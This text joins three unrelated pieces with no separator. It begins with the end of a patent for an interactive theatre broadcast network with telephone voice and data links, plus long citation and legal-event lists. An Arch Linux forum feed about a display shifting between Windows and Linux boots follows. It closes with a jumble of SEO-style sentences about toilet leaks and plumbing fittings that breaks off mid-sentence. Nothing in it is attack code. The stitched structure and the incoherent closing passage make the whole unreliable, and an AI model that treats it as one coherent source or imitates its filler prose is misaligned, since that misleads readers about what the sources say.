transmission requirements downstream and to reduce the number of voice signals forwarded downstream, whereby patrons in the theatres may individually and successively engage in voice communications with persons at the broadcast center and may originate preference data for processing and transmission to the broadcast center responsive to the broadcast signals, displayed for simultaneous perception by all patrons. The invention is appropriate even for small numbers of theatres, which might eventually be incorporated into a larger network. Such a commercial/entertainment network for interactive communications may comprise: at least two theatres, each having means for substantially simultaneously displaying to all patrons, in all of the theatres, broadcast signals originating from a remote source and means enabling the patrons to originate preference data and voice signals responsive to the displayed broadcast signals; a broadcast center remote from the theatres for originating the broadcast signals transmitted to all of the theatres; and, at least one node/filtering means operatively disposed in a telephone communication system, the at least one node/filtering means processing all data received from upstream sources to reduce data rate transmission requirements downstream and to reduce the number of voice signals forwarded downstream, whereby patrons in the theatres may individually and successively engage in voice communications with persons at the broadcast center and may originate preference data for processing and transmission to the broadcast center responsive to the broadcast signals, displayed for simultaneous perception by all patrons. Even in such a small network, substantial savings and efficiencies could be achieved if each of the theatres further comprises: a plurality of uniquely identifiable communication positions, each having remotely activatable input/output means for voice and data communications; a shared patron's telephone; and, means for remotely connecting selected ones of the input/output means to the telephone. It will be appreciated by those skilled in the art that the entertainment/communication network described herein can be embodied with a wide variety of communication, transmission and computer equipment available on the market. It is a particular advantage of the commercial/entertainment network according to this invention that such interactive communication is enabled without the need or expense to develop new equipment specifically designed for the purpose. It is, of course, useful to develop certain computer programs for controlling each of the personal computers in the theaters, the node/filtering means and broadcast center, so as to operate the network in an efficient and business-like manner, particularly with regard to controlling and coordinating financial transactions. The invention may be embodied in other specific forms without departing from the spirit of essential attributes thereof, and accordingly, reference should be made to the appended claims, rather than to the foregoing specification, as indicating the scope of the invention. Patent Citations Cited PatentFiling datePublication dateApplicantTitle US3878322 *Feb 28, 1973Apr 15, 1975Skiatron Elect & TeleInterrogated system US3909536 *May 6, 1974Sep 30, 1975Northern Electric CoAudience survey system US4360827 *Jun 2, 1981Nov 23, 1982Darome, Inc.Method and means for interactive audio and video conferencing US4512033 *Nov 29, 1982Apr 16, 1985C-Cor Labs, Inc.Remote level adjustment system for use in a multi-terminal communications system US4546382 *Dec 8, 1983Oct 8, 1985Ctba AssociatesTelevision and market research data collection system and method US4665516 *Sep 7, 1984May 12, 1987Itt CorporationInformation transport system employing telephone lines Referenced by Citing PatentFiling datePublication dateApplicantTitle US5144548 *Jul 13, 1989Sep 1, 1992Iris Technologies, Inc.Routing switcher US5490207 *Jan 21, 1994Feb 6, 1996Schorr; AndrewMethod of dispersing information and collecting data via telephone systems US5499241 *Sep 17, 1993Mar 12, 1996Scientific-Atlanta, Inc.Broadband communications system US5581555 *Jun 7, 1995Dec 3, 1996Scientific-Atlanta, Inc.Reverse path allocation and contention resolution scheme for a broadband communications system US5594726 *Mar 30, 1994Jan 14, 1997Scientific-Atlanta, Inc.Frequency agile broadband communications system US5625404 *May 31, 1995Apr 29, 1997Bell Atlantic Network ServicesMethod and system for accessing multimedia data over public switched telephone network US5712906 *Mar 29, 1996Jan 27, 1998Bell Atlantic Network ServicesCommunications systems supporting shared multimedia session US5719872 *Nov 27, 1996Feb 17, 1998Scientific-Atlanta, Inc.Reverse path allocation and contention resolution scheme for a broadband communications system US5787156Sep 14, 1994Jul 28, 1998Ronald A. Katz Technology Licensing, LpTelephonic-interface lottery system US5790174 *Mar 6, 1996Aug 4, 1998Bell Atlantic Network Services, Inc.PSTN architecture for video-on-demand services US5801754 *Nov 16, 1995Sep 1, 1998United Artists Theatre Circuit, Inc.Interactive theater network system US5802283 *Mar 29, 1996Sep 1, 1998Bell Atlantic Network Services, Inc.Method and system for accessing multimedia data over public switched telephone network US5818914 *Mar 27, 1995Oct 6, 1998Aucnet Inc.Auction information transmission processing system US5898762Jun 6, 1995Apr 27, 1999Ronald A. Katz Technology Licensing, L.P.Telephonic-interface statistical analysis system US5917893Jun 7, 1995Jun 29, 1999Ronald A. Katz Technology Licensing, L.P.Multiple format telephonic interface control system US5924013 *Sep 3, 1997Jul 13, 1999Guido; Mary M.Method and apparatus for transmitting motion picture cinematic information for viewing in movie theaters and ordering method therefor US6012045 *Jul 1, 1997Jan 4, 2000Barzilai; NizanComputer-based electronic bid, auction and sale system, and a system to teach new/non-registered customers how bidding, auction purchasing works US6016344Apr 10, 1989Jan 18, 2000Katz; Ronald A.Telephonic-interface statistical analysis system US6035021Jun 7, 1995Mar 7, 2000Katz; Ronald A.Telephonic-interface statistical analysis system US6044135Aug 12, 1998Mar 28, 2000Ronald A. Katz Technology Licensing, L.P.Telephone-interface lottery system US6148065Jan 13, 1998Nov 14, 2000Ronald A. Katz Technology Licensing, L.P.Telephonic-interface statistical analysis system US6292547Mar 15, 1999Sep 18, 2001Ronald A. Katz Technology Licensing, L.P.Telephonic-interface statistical analysis system US6349134Jun 7, 1995Feb 19, 2002Ronald A. Katz Technology Licensing, L.P.Telephonic-interface statistical analysis system US6384893 *Dec 11, 1998May 7, 2002Sony CorporationCinema networking system US6424703Feb 11, 1998Jul 23, 2002Ronald A. Katz Technology Licensing, L.P.Telephonic-interface lottery system US6434223May 17, 1999Aug 13, 2002Ronald A. Katz Technology Licensing, L.P.Telephone interface call processing system with call selectivity US6449346Jun 7, 1995Sep 10, 2002Ronald A. Katz Technology Licensing, L.P.Telephone-television interface statistical analysis system US6512415Jun 28, 1999Jan 28, 2003Ronald A. Katz Technology Licensing Lp.Telephonic-interface game control system US6570967Jun 7, 1995May 27, 2003Ronald A. Katz Technology Licensing, L.P.Voice-data telephonic interface control system US6678360Aug 25, 2000Jan 13, 2004Ronald A. Katz Technology Licensing, L.P.Telephonic-interface statistical analysis system US6873693 *Dec 7, 1999Mar 29, 2005Microstrategy, IncorporatedSystem and method for real-time, personalized, dynamic, interactive voice services for entertainment-related information US6940953Sep 13, 2000Sep 6, 2005Microstrategy, Inc.System and method for the creation and automatic deployment of personalized, dynamic and interactive voice services including module for generating and formatting voice services US6947966Oct 13, 2000Sep 20, 2005Road Runner Holdco LlcSystem and method for influencing dynamic community shared elements of audio, video, and text programming via a polling system US6977992Sep 27, 2004Dec 20, 2005Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with real-time database queries US7017178Sep 30, 1998Mar 21, 2006Sedna Patent Services, LlcAudio program reception terminal for television delivery system US7020251May 7, 2003Mar 28, 2006Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with real-time drilling via telephone US7062222 *Dec 17, 2001Jun 13, 2006Nokia CorporationInitiating a wireless connection to a broadcast program US7082422Dec 14, 1999Jul 25, 2006Microstrategy, IncorporatedSystem and method for automatic transmission of audible on-line analytical processing system report output US7124426Mar 26, 1998Oct 17, 2006News Datacom LimitedEntertainment system US7197461Sep 13, 2000Mar 27, 2007Microstrategy, IncorporatedSystem and method for voice-enabled input for use in the creation and automatic deployment of personalized, dynamic, and interactive voice services US7249055Jul 7, 2000Jul 24, 2007Citicorp Credit Services, Inc.Method and system for managing and conducting a network auction US7260829Feb 18, 1999Aug 21, 2007Sedna Patent Services, LlcTerminal with multiple audio and video US7266181Dec 7, 1999Sep 4, 2007Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized dynamic and interactive voice services with integrated inbound and outbound voice services US7272212Jan 28, 2005Sep 18, 2007Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services US7330847Jan 10, 2003Feb 12, 2008Microstrategy, IncorporatedSystem and method for management of an automatic OLAP report broadcast system US7331057 *Dec 28, 2000Feb 12, 2008Prime Research Alliance E, Inc.Grouping advertisement subavails US7340040Dec 7, 1999Mar 4, 2008Microstrategy, IncorporatedSystem and method for real-time, personalized, dynamic, interactive voice services for corporate-analysis related information US7428302Dec 27, 2004Sep 23, 2008Microstrategy, IncorporatedSystem and method for real-time, personalized, dynamic, interactive voice services for information related to existing travel schedule US7437749 *Dec 15, 1997Oct 14, 2008Scientific-Atlanta, Inc.Interactive subscription television terminal US7440898Sep 13, 2000Oct 21, 2008Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with system and method that enable on-the-fly content and speech generation US7486780Dec 7, 2004Feb 3, 2009Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with telephone-based service utilization and control US7548866Dec 5, 2008Jun 16, 2009Ceats, Inc.Individual seat selection ticketing and reservation system US7548867Dec 5, 2008Jun 16, 2009Ceats, Inc.System and method for maintaining coherency of data entries US7548868Dec 5, 2008Jun 16, 2009Ceats, Inc.Dynamic interactive user interface US7548869Dec 5, 2008Jun 16, 2009Ceats, Inc.System and method for selecting and reserving sets of seats US7548870Dec 11, 2008Jun 16, 2009Ceats, Inc.System and method for selecting and reserving airline seats US7571457Sep 22, 1998Aug 4, 2009Cox Communications, Inc.Advanced set top terminal with electronic mailbox for cable television delivery systems US7593866Dec 30, 2003Sep 22, 2009Ebay Inc.Introducing a fixed-price transaction mechanism in conjunction with an auction transaction mechanism US7640178Jun 19, 2009Dec 29, 2009Ceats, Inc.System and method for selecting and reserving seats using a touch screen device US7657449Apr 24, 2009Feb 2, 2010Ceats, Inc.System and method for selecting and reserving time slots for an appointment US7660727Apr 24, 2009Feb 9, 2010Ceats, Inc.System and method for selecting and reserving rooms at a venue US7660728Jun 5, 2009Feb 9, 2010Ceats, Inc.System and method for selecting and reserving airline seats US7660729Jun 24, 2009Feb 9, 2010Ceats, Inc.System and method for selecting and reserving airline seats US7664663Jun 24, 2009Feb 16, 2010Ceats, Inc.System and method for displaying airline seats US7685009Oct 2, 2008Mar 23, 2010Ceats, Inc.Individual location selection and reservation system US7734251Jun 6, 1995Jun 8, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7752649May 24, 1995Jul 6, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7752650Jun 2, 1995Jul 6, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7761890Jul 20, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7764685Jul 27, 2010Personalized Media Communications, L.L.C.Signal processing apparatus and methods US7769170May 22, 1995Aug 3, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7769344May 16, 1995Aug 3, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7770196Oct 1, 2001Aug 3, 2010Comcast Ip Holdings I, LlcSet top terminal for organizing program options available in television delivery system US7774809Jun 7, 1995Aug 10, 2010Personalized Media Communications, LlcSignal processing apparatus and method US7783252May 23, 1995Aug 24, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7783555Dec 11, 2003Aug 24, 2010Ebay Inc.Auction with interest rate bidding US7784082May 23, 1995Aug 24, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7793332Sep 7, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7797717May 23, 1995Sep 14, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7801304May 24, 1995Sep 21, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7805738Jun 6, 1995Sep 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7805748May 23, 1995Sep 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7805749Jun 7, 1995Sep 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7810115Jun 2, 1995Oct 5, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7814526Jun 6, 1995Oct 12, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7817208Jun 7, 1995Oct 19, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7818761Jun 7, 1995Oct 19, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7818776Jun 7, 1995Oct 19, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7818778Jun 7, 1995Oct 19, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7823175Jun 6, 1995Oct 26, 2010Personalized Media Communications LLCSignal processing apparatus and methods US7827586Jun 6, 1995Nov 2, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7827587Jun 2, 1995Nov 2, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7830925May 24, 1995Nov 9, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7831204Mar 2, 1995Nov 9, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7836480Jun 7, 1995Nov 16, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7836481Sep 28, 2001Nov 16, 2010Comcast Ip Holdings I, LlcSet top terminal for generating an interactive electronic program guide for use with television delivery system US7840976May 23, 1995Nov 23, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7844995Jun 7, 1995Nov 30, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7849479May 23, 1995Dec 7, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7849493May 19, 1995Dec 7, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7856649May 24, 1995Dec 21, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7856650Aug 30, 1993Dec 21, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7860131Jun 7, 1995Dec 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7861263Jun 6, 1995Dec 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7861278May 19, 1995Dec 28, 2010Personalized Media Communications, LlcSignal processing apparatus and methods US7864248Jun 7, 1995Jan 4, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US7864956Jun 7, 1995Jan 4, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US7865920May 19, 1995Jan 4, 2011Personalized Media Communications LLCSignal processing apparatus and methods US7870581Jun 7, 1995Jan 11, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US7881443May 19, 2003Feb 1, 2011Microstrategy, IncorporatedSystem and method for real-time, personalized, dynamic, interactive voice services for travel availability information US7881953Jun 5, 2009Feb 1, 2011Ceats, Inc.System and method for selecting and reserving airline seats US7881954Oct 1, 2009Feb 1, 2011Ceats, Inc.System and method for managing seat reservations US7885839Jun 5, 2009Feb 8, 2011Ceats, Inc.User interface for displaying travel information US7889865Feb 15, 2011Personalized Media Communications, L.L.C.Signal processing apparatus and methods US7904346Mar 8, 2011Ebay Inc.Method and system to adjust a seller fixed price offer US7908638Jun 7, 1995Mar 15, 2011Personalized Media Communications LLCSignal processing apparatus and methods US7926084Apr 12, 2011Personalized Media Communications LLCSignal processing apparatus and methods US7940931May 10, 2011Personalized Media Communications LLCSignal processing apparatus and methods US7953223May 23, 1995May 31, 2011Personalized Media Communications, L.L.C.Signal processing apparatus and methods US7958527Jun 7, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US7966640Jun 21, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US7983977Dec 10, 2002Jul 19, 2011Ebay Inc.Method and system for performing a progressive auction US7992169Jun 7, 1995Aug 2, 2011Personalized Media Communications LLCSignal processing apparatus and methods US8015103Feb 22, 2010Sep 6, 2011Ebay Inc.Auction with interest rate bidding US8046791Oct 25, 2011Personalized Media Communications, LlcSignal processing apparatus and methods US8051369May 9, 2005Nov 1, 2011Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, including deployment through personalized broadcasts US8060903May 19, 1995Nov 15, 2011Personalized Media PMC Communications, L.L.C.Signal processing apparatus and methods US8060905Oct 1, 2001Nov 15, 2011Comcast Ip Holdings I, LlcTelevision delivery system having interactive electronic program guide US8087045Feb 1, 2008Dec 27, 2011Prime Research Alliance E, Inc.Grouping advertisement subavails US8094788Feb 12, 2002Jan 10, 2012Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services with customized message depending on recipient US8112782Feb 7, 2012Personalized Media Communications, LlcSignal processing apparatus and methods US8130918Feb 13, 2002Mar 6, 2012Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with closed loop transaction processing US8180831 *Dec 18, 2002May 15, 2012International Business Machines CompanyAd-hoc media delivery system US8191091Jun 7, 1995May 29, 2012Personalized Media Communications, LlcSignal processing apparatus and methods US8219448Nov 23, 2010Jul 10, 2012Ceats, Inc.System and method for managing airline seat reservations US8229774Jul 18, 2011Jul 24, 2012Ceats, Inc.System and method for arbitrating the selection and reserving of airline seats US8239225Feb 8, 2012Aug 7, 2012Ceats, Inc.System and method for selection of airline seats and payment verification US8244561Feb 8, 2012Aug 14, 2012Ceats, Inc.System and method for selecting and reserving airline seats US8276183Sep 15, 1999Sep 25, 2012Cox Communications, Inc.Television terminal data storage US8321411Feb 11, 2008Nov 27, 2012Microstrategy, IncorporatedSystem and method for management of an automatic OLAP report broadcast system US8347345Sep 15, 1999Jan 1, 2013Cox Communications, Inc.Television terminal modem US8355937Jun 22, 2012Jan 15, 2013Ceats, Inc.System and method for managing seat reservations US8374948Feb 12, 2013Ebay Inc.System and method for receiving a bid US8386366Dec 21, 2007Feb 26, 2013Ebay Inc.System and method for creating a customer account US8395707Jun 2, 1995Mar 12, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8433643Jul 13, 2011Apr 30, 2013Ebay Inc.Auction with interest rate bidding US8452704Jul 11, 2001May 28, 2013Citicorp Credit Services, Inc.Method and system for on-line payments US8555310Jun 7, 1995Oct 8, 2013Personalized Media Communications, LlcSignal processing apparatus and methods US8558950May 16, 1995Oct 15, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8559635May 24, 1995Oct 15, 2013Personalized Media Communications, L.L.C.Signal processing apparatus and methods US8566868Jun 2, 1995Oct 22, 2013Personalized Media Communications, L.L.C.Signal processing apparatus and methods US8572671May 19, 1995Oct 29, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8578410Dec 17, 2010Nov 5, 2013Comcast Ip Holdings, I, LlcVideo and digital multimedia aggregator content coding and formatting US8584162May 23, 1995Nov 12, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8587720Jun 5, 1995Nov 19, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8601528Jun 7, 1995Dec 3, 2013Personalized Media Communications, L.L.C.Signal processing apparatus and methods US8607138Jul 15, 2005Dec 10, 2013Microstrategy, IncorporatedSystem and method for OLAP report generation with spreadsheet report within the network user interface US8607296Jun 7, 1995Dec 10, 2013Personalized Media Communications LLCSignal processing apparatus and methods US8613034Jun 7, 1995Dec 17, 2013Personalized Media Communications, LlcSignal processing apparatus and methods US8621521Jul 9, 2012Dec 31, 2013Comcast Ip Holdings I, LlcVideo and digital multimedia aggregator US8621547May 16, 1995Dec 31, 2013Personalized Media Communications, LlcSignal processing apparatus and methods US8635644Jun 6, 1995Jan 21, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8640184Jun 7, 1995Jan 28, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8646001May 19, 1995Feb 4, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8666876Dec 11, 2012Mar 4, 2014Ebay, Inc.System and method for creating a customer account US8675775Jun 7, 1995Mar 18, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8677401Dec 27, 2011Mar 18, 2014Prime Research Alliance E, Inc.Grouping advertisement subavails US8683539Jun 7, 1995Mar 25, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8711885Jun 2, 1995Apr 29, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8713624Jun 7, 1995Apr 29, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8739241Jun 7, 1995May 27, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8751326Jun 30, 2009Jun 10, 2014Ebay Inc.Introducing a fixed-price transaction mechanism in conjunction with an auction transaction mechanism US8752088Jun 7, 1995Jun 10, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8775223Sep 14, 2012Jul 8, 2014Ceats, Inc.System and method for managing seat reservations US8804727Jun 2, 1995Aug 12, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8813137 *Jan 16, 2007Aug 19, 2014Qualcomm IncorporatedApparatus and method for decoding digital image and audio signals US8839293May 19, 1995Sep 16, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8864566Apr 23, 2007Oct 21, 2014Timeplay Inc.System, method and handheld controller for multi-player gaming US8869228Jun 2, 1995Oct 21, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8869229Jun 7, 1995Oct 21, 2014Personalized Media Communications, LlcSignal processing apparatus and methods US8893177May 23, 1995Nov 18, 2014{Personalized Media Communications, LLCSignal processing apparatus and methods US8914825May 19, 1995Dec 16, 2014Personalized Media Communications LLCSignal processing apparatus and methods US8951124Dec 15, 2009Feb 10, 2015Timeplay, Inc.System, method and handheld controller for multi-player gaming US8973034May 9, 1995Mar 3, 2015Personalized Media Communications LLCSignal processing apparatus and methods US8995628Mar 6, 2012Mar 31, 2015Microstrategy, IncorporatedSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services with closed loop transaction processing US9009773 *Jun 30, 1998Apr 14, 2015Cox Communications, Inc.Method and apparatus for providing broadcast data services US9038124May 26, 1995May 19, 2015Personalized Media Communications, LlcSignal processing apparatus and methods US9070161 *Aug 15, 2012Jun 30, 2015Philip L. EliasMethod of conducting auctions and audience guided events utilizing closed network satellite broadcasts to multiple location digital theater environments with integrated real time audience interaction US9078014Dec 23, 2011Jul 7, 2015Comcast Ip Holdings I, LlcMethod and apparatus for targeting of interactive virtual objects US9124949Mar 18, 2014Sep 1, 2015Prime Research Alliance E, Inc.Grouping advertisement subavails US9189813Dec 10, 2002Nov 17, 2015Ebay Inc.Method and system for updating information on a merchandise catalog page US9208213Oct 14, 2005Dec 8, 2015Microstrategy, IncorporatedSystem and method for network user interface OLAP report formatting US9210370Jun 2, 1995Dec 8, 2015Personalized Media Communications LLCSignal processing apparatus and methods US20020016769 *Jul 11, 2001Feb 7, 2002Ellen BarbaraMethod and system for on-line payments US20020087980 *Dec 28, 2000Jul 4, 2002Eldering Charles A.Grouping advertisement subavails US20030083982 *Dec 10, 2002May 1, 2003Fisher Alan S.Method and system for offering an item for sale using a user-selectable bid indicia US20030088503 *Dec 10, 2002May 8, 2003Fisher Alan S.Method and system for performing a progressive auction US20030105710 *Sep 4, 2002Jun 5, 2003Ellen BarbaraMethod and system for on-line payments US20030114145 *Dec 17, 2001Jun 19, 2003Nokia CorporationInitiating a wireless connection to a broadcast program US20040123321 *Dec 18, 2002Jun 24, 2004International Business Machines CorporationAd-hoc media delivery system US20050036593 *Sep 27, 2004Feb 17, 2005Michael ZirngiblSystem and method for the creation and automatic deployment of personalized, dynamic and interactive voice services, with real-time database queries US20050131809 *Dec 11, 2003Jun 16, 2005Watt William R.IiAuction with interest rate bidding US20050135619 *Jan 5, 2005Jun 23, 2005Morley Steven A.Apparatus and method for encoding and storage of digital image and audio signals US20060068917 *Sep 21, 2005Mar 30, 2006Snoddy Jon HSystem, method and handheld controller for multi-player gaming US20060141481 *Dec 27, 2004Jun 29, 2006Mariani Brian DHSV-1 and HSV-2 primers and probes US20070011705 *Sep 11, 2006Jan 11, 2007News Datacom Ltd.Passenger aircraft entertainment system US20070245386 *Jan 16, 2007Oct 18, 2007Qualcomm IncorporatedApparatus and method for decoding digital image and audio signals US20070255644 *Jul 2, 2007Nov 1, 2007Richard ElderMethod and system for managing and conducting a network auction US20070270206 *Apr 23, 2007Nov 22, 2007Snoddy Jon HSystem, method and handheld controller for multi-player gaming US20080214273 *Jan 31, 2007Sep 4, 2008Snoddy Jon HSystem, method and handheld controller for multi-player gaming US20090030748 *Oct 2, 2008Jan 29, 2009Richard Arthur HalavaisIndividual seat selection ticketing and reservation system US20090204450 *Apr 24, 2009Aug 13, 2009Richard Arthur HalavaisSystem and method for selecting and reserving time slots for an appointment US20090204451 *Apr 24, 2009Aug 13, 2009Richard Arthur HalavaisSystem and method for selecting and reserving rooms at a venue US20090240536 *Jun 5, 2009Sep 24, 2009Richard Arthur HalavaisSystem and method for selecting and reserving airline seats US20090254384 *Jun 24, 2009Oct 8, 2009Richard Arthur HalavaisSystem and method for selecting and reserving airline seats US20090254385 *Jun 24, 2009Oct 8, 2009Richard Arthur HalavaisSystem and method for displaying airline seats US20090259498 *Jun 19, 2009Oct 15, 2009Richard Arthur HalavaisSystem and method for selecting and reserving seats using a touch screen device US20090276251 *Nov 5, 2009Richard Arthur HalavaisSystem and method for selecting and reserving airline seats US20100036689 *Oct 1, 2009Feb 11, 2010Ceats, Inc.System and method for managing airline seat reservations US20100178973 *Jan 15, 2010Jul 15, 2010Timeplay Ip, Inc.System, method and handheld controller for multi-player gaming US20100257087 *Feb 22, 2010Oct 7, 2010Ebay Inc.Auction with interest rate bidding USRE44685Jul 10, 2001Dec 31, 2013Opentv, Inc.Apparatus for transmitting and receiving executable applications as for a multimedia system, and method and system to order an item using a distributed computing system WO1998047249A2 *Mar 26, 1998Oct 22, 1998Amir EilatPassenger aircraft entertainment system WO1999012350A1 *Sep 3, 1998Mar 11, 1999Mary M GuidoMethod and apparatus for transmitting motion picture cinematic information for viewing in movie theaters WO2001067770A1 *Mar 5, 2001Sep 13, 2001Mizrahi Entpr IncMethod and system for selectively recording content relating to an audio/visual presentation Classifications U.S. Classification379/92.01, 725/78, 725/66, 725/122, 725/82, 725/86 International ClassificationH04M11/00 Cooperative ClassificationH04M11/00 European ClassificationH04M11/00 Legal Events DateCodeEventDescription Jul 5, 1994REMIMaintenance fee reminder mailed Nov 27, 1994LAPSLapse for failure to pay maintenance fees Feb 7, 1995FPExpired due to failure to pay maintenance fee Effective date: 19941130
<![CDATA[Arch Linux Forums / Screen moves to the right when booting arch (or linux)]]> 2003-04-06T18:28:43Z FluxBB https://bbs.archlinux.org/viewtopic.php?id=528 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> thx! that solved my problem completely ]]> https://bbs.archlinux.org/profile.php?id=95 2003-04-06T18:28:43Z https://bbs.archlinux.org/viewtopic.php?pid=3109#p3109 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> apeiro wrote: Try changing your Modelines in XF86Config.  You can generate them with the xvidtune program. This is most likely the problem. Newer versions of X are capable of scanning the via PnP which may also cause problems. Of course you might get lucky by letting X detect the proper settings by commenting out any modelines in X configuration file. FWIW, you can also change the frequency in Windows although this may not apply to all video cards. Generally Windows tries to use the video card's settings. Between the X settings and the Windows settings you should be able to match them. ]]> https://bbs.archlinux.org/profile.php?id=107 2003-04-05T22:03:44Z https://bbs.archlinux.org/viewtopic.php?pid=3090#p3090 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> Try changing your Modelines in XF86Config.  You can generate them with the xvidtune program. ]]> https://bbs.archlinux.org/profile.php?id=3 2003-04-05T19:20:24Z https://bbs.archlinux.org/viewtopic.php?pid=3089#p3089 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> Yes, I have an nvidia card, but also the latest driver on windows... But now I think I know when this problem got fixed on gentoo: maybe after installing the linux nvidia driver (I'm using nv2 now) I'll install the nvidia driver to see what it gives... ]]> https://bbs.archlinux.org/profile.php?id=95 2003-04-05T18:50:15Z https://bbs.archlinux.org/viewtopic.php?pid=3087#p3087 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> nvidia based card? maybe you are suffering from the 75hz "bug" in windows. If your monitor can handle a frequency of 75+hz and your windows is using an older version of the nvidia drivers then your windows will cap the frequency to 75hz (so I've heard) Try installing the latest nvidia drivers for both windows and arch. ]]> https://bbs.archlinux.org/profile.php?id=4 2003-04-05T18:12:34Z https://bbs.archlinux.org/viewtopic.php?pid=3081#p3081 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> Yes, and that's the problem. If I'd run both in a different resolution, my monitor would remember the exact position. Now they're both using 1280*1024 Nope, X doesn't know my monitor, but I've given it the H/V sync that are in my monitor's manual ]]> https://bbs.archlinux.org/profile.php?id=95 2003-04-05T09:48:30Z https://bbs.archlinux.org/viewtopic.php?pid=3077#p3077 <![CDATA[Re: Screen moves to the right when booting arch (or linux)]]> Do you run linux and windowscin the exact same resolution? Have you told X what kind of a monitor you have? These are monitor refresh related "problems" ]]> https://bbs.archlinux.org/profile.php?id=4 2003-04-05T09:41:55Z https://bbs.archlinux.org/viewtopic.php?pid=3076#p3076 <![CDATA[Screen moves to the right when booting arch (or linux)]]> I'm not the only one that's working on this box, and they only use windows. But when the screen is centered in windows, and I boot it in arch then, I have to move it to the left (30 pixels or something) and after booting in windows, it has to be moved to the right again... This is not an arch specific problem, and I had the same problem with gentoo too in the beginning, but somehow that got sorted out :shock: Am I the only one with this problem? are there solutions? thx ]]> https://bbs.archlinux.org/profile.php?id=95 2003-04-05T07:31:54Z https://bbs.archlinux.org/viewtopic.php?pid=3075#p3075
Buy Online & Pickup Today. Suitable for low level and high level flush pipes. Then follow our step-by-step instructions on our article: How to Replace a Toilet Seal in 16 Steps. How to Tighten Water Supply Line Connectors. That's how it's usually done as otherwise the joint between the WC connector and the PVC pipe would leakand no, they are not usually a screwed type joint. How to stop leaks on threaded copper fittings. Get contact details & address of companies manufacturing and supplying Flush Tank Fittings, Cistern Fitting, Toilet Cistern Fitting across India. About a 3rd of the brass fittings I have fitted in the kitchen and bathroom have a very slow leak. A flush toilet (also known as a flushing toilet, water closet (WC) – see also toilet (names)) is a toilet that disposes of human excreta (urine and feces) by using water to flush it through a drainpipe to another location for disposal, thus maintaining a separation between humans and their excreta. If you can, take a picture of the toilet’s base and ask a pro at the store to help you find a comparable replacement. How old is the house and check for vents if accessable. Leaks from pipes, plumbing fixtures and fittings are a significant source of water waste for many households. The dreaded leak that comes from the back of your WC pan. If water is leaking from the base after you flush the toilet, this could be because the wax seal is damaged. From all the plumbing fixtures in the home, the toilet is the number one water waster. Instead of going directly into the sewer drain, the used toilet bowl water can seep onto your bathroom floor. Toilets are responsible for the most common, and the worst, leaks inside homes. They will be relatively rare and even infrequent when you have a new toilet. Flush the toilet several times and check 